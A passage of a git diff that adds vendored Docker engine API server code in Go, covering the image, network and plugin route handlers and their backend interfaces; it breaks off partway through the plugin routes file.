imageRouter struct { + backend Backend + decoder httputils.ContainerDecoder + routes []router.Route +} + +// NewRouter initializes a new image router +func NewRouter(backend Backend, decoder httputils.ContainerDecoder) router.Router { + r := &imageRouter{ + backend: backend, + decoder: decoder, + } + r.initRoutes() + return r +} + +// Routes returns the available routes to the image controller +func (r *imageRouter) Routes() []router.Route { + return r.routes +} + +// initRoutes initializes the routes in the image router +func (r *imageRouter) initRoutes() { + r.routes = []router.Route{ + // GET + router.NewGetRoute("/images/json", r.getImagesJSON), + router.NewGetRoute("/images/search", r.getImagesSearch), + router.NewGetRoute("/images/get", r.getImagesGet), + router.NewGetRoute("/images/{name:.*}/get", r.getImagesGet), + router.NewGetRoute("/images/{name:.*}/history", r.getImagesHistory), + router.NewGetRoute("/images/{name:.*}/json", r.getImagesByName), + // POST + router.NewPostRoute("/commit", r.postCommit), + router.NewPostRoute("/images/load", r.postImagesLoad), + router.Cancellable(router.NewPostRoute("/images/create", r.postImagesCreate)), + router.Cancellable(router.NewPostRoute("/images/{name:.*}/push", r.postImagesPush)), + router.NewPostRoute("/images/{name:.*}/tag", r.postImagesTag), + router.NewPostRoute("/images/prune", r.postImagesPrune), + // DELETE + router.NewDeleteRoute("/images/{name:.*}", r.deleteImages), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/image/image_routes.go b/vendor/github.com/docker/docker/api/server/router/image/image_routes.go new file mode 100644 index 0000000000..69403652a0 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/image/image_routes.go @@ -0,0 +1,344 @@ +package image + +import ( + "encoding/base64" + "encoding/json" + "fmt" + "io" + "net/http" + "strconv" + "strings" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + 
"github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/registry" + "golang.org/x/net/context" +) + +func (s *imageRouter) postCommit(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + cname := r.Form.Get("container") + + pause := httputils.BoolValue(r, "pause") + version := httputils.VersionFromContext(ctx) + if r.FormValue("pause") == "" && versions.GreaterThanOrEqualTo(version, "1.13") { + pause = true + } + + c, _, _, err := s.decoder.DecodeConfig(r.Body) + if err != nil && err != io.EOF { //Do not fail if body is empty. + return err + } + if c == nil { + c = &container.Config{} + } + + commitCfg := &backend.ContainerCommitConfig{ + ContainerCommitConfig: types.ContainerCommitConfig{ + Pause: pause, + Repo: r.Form.Get("repo"), + Tag: r.Form.Get("tag"), + Author: r.Form.Get("author"), + Comment: r.Form.Get("comment"), + Config: c, + MergeConfigs: true, + }, + Changes: r.Form["changes"], + } + + imgID, err := s.backend.Commit(cname, commitCfg) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusCreated, &types.IDResponse{ + ID: string(imgID), + }) +} + +// Creates an image from Pull or from Import +func (s *imageRouter) postImagesCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + var ( + image = r.Form.Get("fromImage") + repo = r.Form.Get("repo") + tag = r.Form.Get("tag") + message = r.Form.Get("message") + err error + output = ioutils.NewWriteFlusher(w) + ) + defer output.Close() + + 
w.Header().Set("Content-Type", "application/json") + + if image != "" { //pull + metaHeaders := map[string][]string{} + for k, v := range r.Header { + if strings.HasPrefix(k, "X-Meta-") { + metaHeaders[k] = v + } + } + + authEncoded := r.Header.Get("X-Registry-Auth") + authConfig := &types.AuthConfig{} + if authEncoded != "" { + authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded)) + if err := json.NewDecoder(authJSON).Decode(authConfig); err != nil { + // for a pull it is not an error if no auth was given + // to increase compatibility with the existing api it is defaulting to be empty + authConfig = &types.AuthConfig{} + } + } + + err = s.backend.PullImage(ctx, image, tag, metaHeaders, authConfig, output) + } else { //import + src := r.Form.Get("fromSrc") + // 'err' MUST NOT be defined within this block, we need any error + // generated from the download to be available to the output + // stream processing below + err = s.backend.ImportImage(src, repo, tag, message, r.Body, output, r.Form["changes"]) + } + if err != nil { + if !output.Flushed() { + return err + } + sf := streamformatter.NewJSONStreamFormatter() + output.Write(sf.FormatError(err)) + } + + return nil +} + +func (s *imageRouter) postImagesPush(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + metaHeaders := map[string][]string{} + for k, v := range r.Header { + if strings.HasPrefix(k, "X-Meta-") { + metaHeaders[k] = v + } + } + if err := httputils.ParseForm(r); err != nil { + return err + } + authConfig := &types.AuthConfig{} + + authEncoded := r.Header.Get("X-Registry-Auth") + if authEncoded != "" { + // the new format is to handle the authConfig as a header + authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded)) + if err := json.NewDecoder(authJSON).Decode(authConfig); err != nil { + // to increase compatibility to existing api it is defaulting to be empty + authConfig = &types.AuthConfig{} + } + } 
else { + // the old format is supported for compatibility if there was no authConfig header + if err := json.NewDecoder(r.Body).Decode(authConfig); err != nil { + return fmt.Errorf("Bad parameters and missing X-Registry-Auth: %v", err) + } + } + + image := vars["name"] + tag := r.Form.Get("tag") + + output := ioutils.NewWriteFlusher(w) + defer output.Close() + + w.Header().Set("Content-Type", "application/json") + + if err := s.backend.PushImage(ctx, image, tag, metaHeaders, authConfig, output); err != nil { + if !output.Flushed() { + return err + } + sf := streamformatter.NewJSONStreamFormatter() + output.Write(sf.FormatError(err)) + } + return nil +} + +func (s *imageRouter) getImagesGet(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + w.Header().Set("Content-Type", "application/x-tar") + + output := ioutils.NewWriteFlusher(w) + defer output.Close() + var names []string + if name, ok := vars["name"]; ok { + names = []string{name} + } else { + names = r.Form["names"] + } + + if err := s.backend.ExportImage(names, output); err != nil { + if !output.Flushed() { + return err + } + sf := streamformatter.NewJSONStreamFormatter() + output.Write(sf.FormatError(err)) + } + return nil +} + +func (s *imageRouter) postImagesLoad(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + quiet := httputils.BoolValueOrDefault(r, "quiet", true) + + w.Header().Set("Content-Type", "application/json") + + output := ioutils.NewWriteFlusher(w) + defer output.Close() + if err := s.backend.LoadImage(r.Body, output, quiet); err != nil { + output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err)) + } + return nil +} + +func (s *imageRouter) deleteImages(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := 
httputils.ParseForm(r); err != nil { + return err + } + + name := vars["name"] + + if strings.TrimSpace(name) == "" { + return fmt.Errorf("image name cannot be blank") + } + + force := httputils.BoolValue(r, "force") + prune := !httputils.BoolValue(r, "noprune") + + list, err := s.backend.ImageDelete(name, force, prune) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, list) +} + +func (s *imageRouter) getImagesByName(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + imageInspect, err := s.backend.LookupImage(vars["name"]) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, imageInspect) +} + +func (s *imageRouter) getImagesJSON(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + imageFilters, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + version := httputils.VersionFromContext(ctx) + filterParam := r.Form.Get("filter") + if versions.LessThan(version, "1.28") && filterParam != "" { + imageFilters.Add("reference", filterParam) + } + + images, err := s.backend.Images(imageFilters, httputils.BoolValue(r, "all"), false) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, images) +} + +func (s *imageRouter) getImagesHistory(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + name := vars["name"] + history, err := s.backend.ImageHistory(name) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, history) +} + +func (s *imageRouter) postImagesTag(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + if err := s.backend.TagImage(vars["name"], r.Form.Get("repo"), r.Form.Get("tag")); err != nil { + return err 
+ } + w.WriteHeader(http.StatusCreated) + return nil +} + +func (s *imageRouter) getImagesSearch(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + var ( + config *types.AuthConfig + authEncoded = r.Header.Get("X-Registry-Auth") + headers = map[string][]string{} + ) + + if authEncoded != "" { + authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded)) + if err := json.NewDecoder(authJSON).Decode(&config); err != nil { + // for a search it is not an error if no auth was given + // to increase compatibility with the existing api it is defaulting to be empty + config = &types.AuthConfig{} + } + } + for k, v := range r.Header { + if strings.HasPrefix(k, "X-Meta-") { + headers[k] = v + } + } + limit := registry.DefaultSearchLimit + if r.Form.Get("limit") != "" { + limitValue, err := strconv.Atoi(r.Form.Get("limit")) + if err != nil { + return err + } + limit = limitValue + } + query, err := s.backend.SearchRegistryForImages(ctx, r.Form.Get("filters"), r.Form.Get("term"), limit, config, headers) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, query.Results) +} + +func (s *imageRouter) postImagesPrune(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + pruneFilters, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + pruneReport, err := s.backend.ImagesPrune(pruneFilters) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, pruneReport) +} diff --git a/vendor/github.com/docker/docker/api/server/router/local.go b/vendor/github.com/docker/docker/api/server/router/local.go new file mode 100644 index 0000000000..7cb2a5a2f3 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/local.go @@ -0,0 +1,96 @@ +package router + 
+import ( + "net/http" + + "github.com/docker/docker/api/server/httputils" + "golang.org/x/net/context" +) + +// localRoute defines an individual API route to connect +// with the docker daemon. It implements Route. +type localRoute struct { + method string + path string + handler httputils.APIFunc +} + +// Handler returns the APIFunc to let the server wrap it in middlewares. +func (l localRoute) Handler() httputils.APIFunc { + return l.handler +} + +// Method returns the http method that the route responds to. +func (l localRoute) Method() string { + return l.method +} + +// Path returns the subpath where the route responds to. +func (l localRoute) Path() string { + return l.path +} + +// NewRoute initializes a new local route for the router. +func NewRoute(method, path string, handler httputils.APIFunc) Route { + return localRoute{method, path, handler} +} + +// NewGetRoute initializes a new route with the http method GET. +func NewGetRoute(path string, handler httputils.APIFunc) Route { + return NewRoute("GET", path, handler) +} + +// NewPostRoute initializes a new route with the http method POST. +func NewPostRoute(path string, handler httputils.APIFunc) Route { + return NewRoute("POST", path, handler) +} + +// NewPutRoute initializes a new route with the http method PUT. +func NewPutRoute(path string, handler httputils.APIFunc) Route { + return NewRoute("PUT", path, handler) +} + +// NewDeleteRoute initializes a new route with the http method DELETE. +func NewDeleteRoute(path string, handler httputils.APIFunc) Route { + return NewRoute("DELETE", path, handler) +} + +// NewOptionsRoute initializes a new route with the http method OPTIONS. +func NewOptionsRoute(path string, handler httputils.APIFunc) Route { + return NewRoute("OPTIONS", path, handler) +} + +// NewHeadRoute initializes a new route with the http method HEAD. 
+func NewHeadRoute(path string, handler httputils.APIFunc) Route { + return NewRoute("HEAD", path, handler) +} + +func cancellableHandler(h httputils.APIFunc) httputils.APIFunc { + return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if notifier, ok := w.(http.CloseNotifier); ok { + notify := notifier.CloseNotify() + notifyCtx, cancel := context.WithCancel(ctx) + finished := make(chan struct{}) + defer close(finished) + ctx = notifyCtx + go func() { + select { + case <-notify: + cancel() + case <-finished: + } + }() + } + return h(ctx, w, r, vars) + } +} + +// Cancellable makes new route which embeds http.CloseNotifier feature to +// context.Context of handler. +func Cancellable(r Route) Route { + return localRoute{ + method: r.Method(), + path: r.Path(), + handler: cancellableHandler(r.Handler()), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/network/backend.go b/vendor/github.com/docker/docker/api/server/router/network/backend.go new file mode 100644 index 0000000000..0d1dfb0123 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/network/backend.go @@ -0,0 +1,22 @@ +package network + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/network" + "github.com/docker/libnetwork" +) + +// Backend is all the methods that need to be implemented +// to provide network specific functionality. 
+type Backend interface { + FindNetwork(idName string) (libnetwork.Network, error) + GetNetworkByName(idName string) (libnetwork.Network, error) + GetNetworksByID(partialID string) []libnetwork.Network + GetNetworks() []libnetwork.Network + CreateNetwork(nc types.NetworkCreateRequest) (*types.NetworkCreateResponse, error) + ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error + DisconnectContainerFromNetwork(containerName string, networkName string, force bool) error + DeleteNetwork(name string) error + NetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) +} diff --git a/vendor/github.com/docker/docker/api/server/router/network/filter.go b/vendor/github.com/docker/docker/api/server/router/network/filter.go new file mode 100644 index 0000000000..94affb83cd --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/network/filter.go @@ -0,0 +1,96 @@ +package network + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/runconfig" +) + +var ( + // AcceptedFilters is an acceptable filters for validation + AcceptedFilters = map[string]bool{ + "driver": true, + "type": true, + "name": true, + "id": true, + "label": true, + } +) + +func filterNetworkByType(nws []types.NetworkResource, netType string) (retNws []types.NetworkResource, err error) { + switch netType { + case "builtin": + for _, nw := range nws { + if runconfig.IsPreDefinedNetwork(nw.Name) { + retNws = append(retNws, nw) + } + } + case "custom": + for _, nw := range nws { + if !runconfig.IsPreDefinedNetwork(nw.Name) { + retNws = append(retNws, nw) + } + } + default: + return nil, fmt.Errorf("Invalid filter: 'type'='%s'", netType) + } + return retNws, nil +} + +// filterNetworks filters network list according to user specified filter +// and returns user chosen networks +func filterNetworks(nws []types.NetworkResource, filter filters.Args) 
([]types.NetworkResource, error) { + // if filter is empty, return original network list + if filter.Len() == 0 { + return nws, nil + } + + if err := filter.Validate(AcceptedFilters); err != nil { + return nil, err + } + + displayNet := []types.NetworkResource{} + for _, nw := range nws { + if filter.Include("driver") { + if !filter.ExactMatch("driver", nw.Driver) { + continue + } + } + if filter.Include("name") { + if !filter.Match("name", nw.Name) { + continue + } + } + if filter.Include("id") { + if !filter.Match("id", nw.ID) { + continue + } + } + if filter.Include("label") { + if !filter.MatchKVList("label", nw.Labels) { + continue + } + } + displayNet = append(displayNet, nw) + } + + if filter.Include("type") { + var typeNet []types.NetworkResource + errFilter := filter.WalkValues("type", func(fval string) error { + passList, err := filterNetworkByType(displayNet, fval) + if err != nil { + return err + } + typeNet = append(typeNet, passList...) + return nil + }) + if errFilter != nil { + return nil, errFilter + } + displayNet = typeNet + } + + return displayNet, nil +} diff --git a/vendor/github.com/docker/docker/api/server/router/network/network.go b/vendor/github.com/docker/docker/api/server/router/network/network.go new file mode 100644 index 0000000000..08a5c8c6a6 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/network/network.go @@ -0,0 +1,44 @@ +package network + +import ( + "github.com/docker/docker/api/server/router" + "github.com/docker/docker/daemon/cluster" +) + +// networkRouter is a router to talk with the network controller +type networkRouter struct { + backend Backend + clusterProvider *cluster.Cluster + routes []router.Route +} + +// NewRouter initializes a new network router +func NewRouter(b Backend, c *cluster.Cluster) router.Router { + r := &networkRouter{ + backend: b, + clusterProvider: c, + } + r.initRoutes() + return r +} + +// Routes returns the available routes to the network controller +func (r *networkRouter) 
Routes() []router.Route { + return r.routes +} + +func (r *networkRouter) initRoutes() { + r.routes = []router.Route{ + // GET + router.NewGetRoute("/networks", r.getNetworksList), + router.NewGetRoute("/networks/", r.getNetworksList), + router.NewGetRoute("/networks/{id:.+}", r.getNetwork), + // POST + router.NewPostRoute("/networks/create", r.postNetworkCreate), + router.NewPostRoute("/networks/{id:.*}/connect", r.postNetworkConnect), + router.NewPostRoute("/networks/{id:.*}/disconnect", r.postNetworkDisconnect), + router.NewPostRoute("/networks/prune", r.postNetworksPrune), + // DELETE + router.NewDeleteRoute("/networks/{id:.*}", r.deleteNetwork), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/network/network_routes.go b/vendor/github.com/docker/docker/api/server/router/network/network_routes.go new file mode 100644 index 0000000000..7bfc499552 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/network/network_routes.go @@ -0,0 +1,308 @@ +package network + +import ( + "encoding/json" + "net/http" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/network" + "github.com/docker/libnetwork" + "github.com/docker/libnetwork/networkdb" +) + +func (n *networkRouter) getNetworksList(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + filter := r.Form.Get("filters") + netFilters, err := filters.FromParam(filter) + if err != nil { + return err + } + + list := []types.NetworkResource{} + + if nr, err := n.clusterProvider.GetNetworks(); err == nil { + list = append(list, nr...) 
+ } + + // Combine the network list returned by Docker daemon if it is not already + // returned by the cluster manager +SKIP: + for _, nw := range n.backend.GetNetworks() { + for _, nl := range list { + if nl.ID == nw.ID() { + continue SKIP + } + } + list = append(list, *n.buildNetworkResource(nw)) + } + + list, err = filterNetworks(list, netFilters) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, list) +} + +func (n *networkRouter) getNetwork(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + nw, err := n.backend.FindNetwork(vars["id"]) + if err != nil { + if nr, err := n.clusterProvider.GetNetwork(vars["id"]); err == nil { + return httputils.WriteJSON(w, http.StatusOK, nr) + } + return err + } + return httputils.WriteJSON(w, http.StatusOK, n.buildNetworkResource(nw)) +} + +func (n *networkRouter) postNetworkCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var create types.NetworkCreateRequest + + if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + if err := json.NewDecoder(r.Body).Decode(&create); err != nil { + return err + } + + if nws, err := n.clusterProvider.GetNetworksByName(create.Name); err == nil && len(nws) > 0 { + return libnetwork.NetworkNameError(create.Name) + } + + nw, err := n.backend.CreateNetwork(create) + if err != nil { + if _, ok := err.(libnetwork.ManagerRedirectError); !ok { + return err + } + id, err := n.clusterProvider.CreateNetwork(create) + if err != nil { + return err + } + nw = &types.NetworkCreateResponse{ID: id} + } + + return httputils.WriteJSON(w, http.StatusCreated, nw) +} + +func (n *networkRouter) postNetworkConnect(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var connect types.NetworkConnect + 
if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + if err := json.NewDecoder(r.Body).Decode(&connect); err != nil { + return err + } + + return n.backend.ConnectContainerToNetwork(connect.Container, vars["id"], connect.EndpointConfig) +} + +func (n *networkRouter) postNetworkDisconnect(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var disconnect types.NetworkDisconnect + if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + if err := json.NewDecoder(r.Body).Decode(&disconnect); err != nil { + return err + } + + return n.backend.DisconnectContainerFromNetwork(disconnect.Container, vars["id"], disconnect.Force) +} + +func (n *networkRouter) deleteNetwork(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + if _, err := n.clusterProvider.GetNetwork(vars["id"]); err == nil { + if err = n.clusterProvider.RemoveNetwork(vars["id"]); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + return nil + } + if err := n.backend.DeleteNetwork(vars["id"]); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (n *networkRouter) buildNetworkResource(nw libnetwork.Network) *types.NetworkResource { + r := &types.NetworkResource{} + if nw == nil { + return r + } + + info := nw.Info() + r.Name = nw.Name() + r.ID = nw.ID() + r.Created = info.Created() + r.Scope = info.Scope() + if n.clusterProvider.IsManager() { + if _, err := n.clusterProvider.GetNetwork(nw.ID()); err == nil { + r.Scope = "swarm" + } + } else if info.Dynamic() { + r.Scope = "swarm" + } + r.Driver = nw.Type() + r.EnableIPv6 = info.IPv6Enabled() + r.Internal = info.Internal() + r.Attachable = info.Attachable() + r.Options = 
info.DriverOptions() + r.Containers = make(map[string]types.EndpointResource) + buildIpamResources(r, info) + r.Labels = info.Labels() + + peers := info.Peers() + if len(peers) != 0 { + r.Peers = buildPeerInfoResources(peers) + } + + epl := nw.Endpoints() + for _, e := range epl { + ei := e.Info() + if ei == nil { + continue + } + sb := ei.Sandbox() + tmpID := e.ID() + key := "ep-" + tmpID + if sb != nil { + key = sb.ContainerID() + } + + r.Containers[key] = buildEndpointResource(tmpID, e.Name(), ei) + } + return r +} + +func buildPeerInfoResources(peers []networkdb.PeerInfo) []network.PeerInfo { + peerInfo := make([]network.PeerInfo, 0, len(peers)) + for _, peer := range peers { + peerInfo = append(peerInfo, network.PeerInfo{ + Name: peer.Name, + IP: peer.IP, + }) + } + return peerInfo +} + +func buildIpamResources(r *types.NetworkResource, nwInfo libnetwork.NetworkInfo) { + id, opts, ipv4conf, ipv6conf := nwInfo.IpamConfig() + + ipv4Info, ipv6Info := nwInfo.IpamInfo() + + r.IPAM.Driver = id + + r.IPAM.Options = opts + + r.IPAM.Config = []network.IPAMConfig{} + for _, ip4 := range ipv4conf { + if ip4.PreferredPool == "" { + continue + } + iData := network.IPAMConfig{} + iData.Subnet = ip4.PreferredPool + iData.IPRange = ip4.SubPool + iData.Gateway = ip4.Gateway + iData.AuxAddress = ip4.AuxAddresses + r.IPAM.Config = append(r.IPAM.Config, iData) + } + + if len(r.IPAM.Config) == 0 { + for _, ip4Info := range ipv4Info { + iData := network.IPAMConfig{} + iData.Subnet = ip4Info.IPAMData.Pool.String() + iData.Gateway = ip4Info.IPAMData.Gateway.IP.String() + r.IPAM.Config = append(r.IPAM.Config, iData) + } + } + + hasIpv6Conf := false + for _, ip6 := range ipv6conf { + if ip6.PreferredPool == "" { + continue + } + hasIpv6Conf = true + iData := network.IPAMConfig{} + iData.Subnet = ip6.PreferredPool + iData.IPRange = ip6.SubPool + iData.Gateway = ip6.Gateway + iData.AuxAddress = ip6.AuxAddresses + r.IPAM.Config = append(r.IPAM.Config, iData) + } + + if !hasIpv6Conf { + 
for _, ip6Info := range ipv6Info { + if ip6Info.IPAMData.Pool == nil { + continue + } + iData := network.IPAMConfig{} + iData.Subnet = ip6Info.IPAMData.Pool.String() + iData.Gateway = ip6Info.IPAMData.Gateway.String() + r.IPAM.Config = append(r.IPAM.Config, iData) + } + } +} + +func buildEndpointResource(id string, name string, info libnetwork.EndpointInfo) types.EndpointResource { + er := types.EndpointResource{} + + er.EndpointID = id + er.Name = name + ei := info + if ei == nil { + return er + } + + if iface := ei.Iface(); iface != nil { + if mac := iface.MacAddress(); mac != nil { + er.MacAddress = mac.String() + } + if ip := iface.Address(); ip != nil && len(ip.IP) > 0 { + er.IPv4Address = ip.String() + } + + if ipv6 := iface.AddressIPv6(); ipv6 != nil && len(ipv6.IP) > 0 { + er.IPv6Address = ipv6.String() + } + } + return er +} + +func (n *networkRouter) postNetworksPrune(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + pruneReport, err := n.backend.NetworksPrune(filters.Args{}) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, pruneReport) +} diff --git a/vendor/github.com/docker/docker/api/server/router/plugin/backend.go b/vendor/github.com/docker/docker/api/server/router/plugin/backend.go new file mode 100644 index 0000000000..ab006b2256 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/plugin/backend.go @@ -0,0 +1,25 @@ +package plugin + +import ( + "io" + "net/http" + + enginetypes "github.com/docker/docker/api/types" + "github.com/docker/docker/reference" + "golang.org/x/net/context" +) + +// Backend for Plugin +type Backend interface { + Disable(name string, config *enginetypes.PluginDisableConfig) error + Enable(name string, config *enginetypes.PluginEnableConfig) error + List() ([]enginetypes.Plugin, error) + Inspect(name string) (*enginetypes.Plugin, error) + Remove(name string, config 
*enginetypes.PluginRmConfig) error + Set(name string, args []string) error + Privileges(ctx context.Context, ref reference.Named, metaHeaders http.Header, authConfig *enginetypes.AuthConfig) (enginetypes.PluginPrivileges, error) + Pull(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error + Push(ctx context.Context, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, outStream io.Writer) error + Upgrade(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error + CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, options *enginetypes.PluginCreateOptions) error +} diff --git a/vendor/github.com/docker/docker/api/server/router/plugin/plugin.go b/vendor/github.com/docker/docker/api/server/router/plugin/plugin.go new file mode 100644 index 0000000000..e4ea9e23bf --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/plugin/plugin.go @@ -0,0 +1,39 @@ +package plugin + +import "github.com/docker/docker/api/server/router" + +// pluginRouter is a router to talk with the plugin controller +type pluginRouter struct { + backend Backend + routes []router.Route +} + +// NewRouter initializes a new plugin router +func NewRouter(b Backend) router.Router { + r := &pluginRouter{ + backend: b, + } + r.initRoutes() + return r +} + +// Routes returns the available routers to the plugin controller +func (r *pluginRouter) Routes() []router.Route { + return r.routes +} + +func (r *pluginRouter) initRoutes() { + r.routes = []router.Route{ + router.NewGetRoute("/plugins", r.listPlugins), + router.NewGetRoute("/plugins/{name:.*}/json", r.inspectPlugin), + router.NewGetRoute("/plugins/privileges", r.getPrivileges), + router.NewDeleteRoute("/plugins/{name:.*}", r.removePlugin), + 
router.NewPostRoute("/plugins/{name:.*}/enable", r.enablePlugin), // PATCH? + router.NewPostRoute("/plugins/{name:.*}/disable", r.disablePlugin), + router.Cancellable(router.NewPostRoute("/plugins/pull", r.pullPlugin)), + router.Cancellable(router.NewPostRoute("/plugins/{name:.*}/push", r.pushPlugin)), + router.Cancellable(router.NewPostRoute("/plugins/{name:.*}/upgrade", r.upgradePlugin)), + router.NewPostRoute("/plugins/{name:.*}/set", r.setPlugin), + router.NewPostRoute("/plugins/create", r.createPlugin), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go b/vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go new file mode 100644 index 0000000000..693fa95baf --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go @@ -0,0 +1,314 @@ +package plugin + +import ( + "encoding/base64" + "encoding/json" + "net/http" + "strconv" + "strings" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/reference" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +func parseHeaders(headers http.Header) (map[string][]string, *types.AuthConfig) { + + metaHeaders := map[string][]string{} + for k, v := range headers { + if strings.HasPrefix(k, "X-Meta-") { + metaHeaders[k] = v + } + } + + // Get X-Registry-Auth + authEncoded := headers.Get("X-Registry-Auth") + authConfig := &types.AuthConfig{} + if authEncoded != "" { + authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded)) + if err := json.NewDecoder(authJSON).Decode(authConfig); err != nil { + authConfig = &types.AuthConfig{} + } + } + + return metaHeaders, authConfig +} + +// parseRemoteRef parses the remote reference into a reference.Named +// returning the tag associated with the 
reference. In the case the +// given reference string includes both digest and tag, the returned +// reference will have the digest without the tag, but the tag will +// be returned. +func parseRemoteRef(remote string) (reference.Named, string, error) { + // Parse remote reference, supporting remotes with name and tag + // NOTE: Using distribution reference to handle references + // containing both a name and digest + remoteRef, err := distreference.ParseNamed(remote) + if err != nil { + return nil, "", err + } + + var tag string + if t, ok := remoteRef.(distreference.Tagged); ok { + tag = t.Tag() + } + + // Convert distribution reference to docker reference + // TODO: remove when docker reference changes reconciled upstream + ref, err := reference.WithName(remoteRef.Name()) + if err != nil { + return nil, "", err + } + if d, ok := remoteRef.(distreference.Digested); ok { + ref, err = reference.WithDigest(ref, d.Digest()) + if err != nil { + return nil, "", err + } + } else if tag != "" { + ref, err = reference.WithTag(ref, tag) + if err != nil { + return nil, "", err + } + } else { + ref = reference.WithDefaultTag(ref) + } + + return ref, tag, nil +} + +func (pr *pluginRouter) getPrivileges(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + metaHeaders, authConfig := parseHeaders(r.Header) + + ref, _, err := parseRemoteRef(r.FormValue("remote")) + if err != nil { + return err + } + + privileges, err := 